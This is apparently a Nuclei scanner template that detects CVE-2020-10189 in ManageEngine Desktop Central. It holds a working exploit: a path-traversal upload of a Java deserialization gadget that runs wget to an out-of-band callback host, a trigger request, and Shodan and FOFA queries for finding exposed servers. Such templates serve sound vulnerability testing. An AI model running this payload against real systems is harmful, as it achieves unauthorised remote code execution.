70 lines
2.3 KiB
YAML
70 lines
2.3 KiB
YAML
id: CVE-2020-10189
|
|
|
|
info:
|
|
name: ManageEngine Desktop Central Java Deserialization
|
|
author: king-alexander
|
|
severity: critical
|
|
description: |
|
|
Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution.
|
|
remediation: |
|
|
Apply updates per vendor instructions.
|
|
reference:
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-10189
|
|
- https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189
|
|
- https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html
|
|
- https://y4er.com/posts/cve-2020-10189-zoho-manageengine-rce/
|
|
- https://cwe.mitre.org/data/definitions/502.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-10189
|
|
cwe-id: CWE-502
|
|
epss-score: 0.97206
|
|
epss-percentile: 0.99826
|
|
cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: zohocorp
|
|
product: manageengine_desktop_central
|
|
fofa-query:
|
|
- body="manageengine desktop central 10"
|
|
- title="manageengine desktop central 10"
|
|
- app="zoho-manageengine-desktop"
|
|
shodan-query: http.title:"manageengine desktop central 10"
|
|
google-query: intitle:"manageengine desktop central 10"
|
|
tags: cve,cve2020,kev,zoho,manageengine,deserialization,intrusive
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/octet-stream
|
|
|
|
{{generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}","raw")}}
|
|
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
GET /cewolf/?img=%5Clogger.zip HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "dns"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100cb3c5b5b1829fc6911828be549f9cd971bec2e2f049b2938748393bb96e164e5022100fed5121eb3d3902d8e4feaee8e6899dc596ae7ecd1bbb92aa9e516371ee59900:922c64590222798bb761d5b6d8e72950 |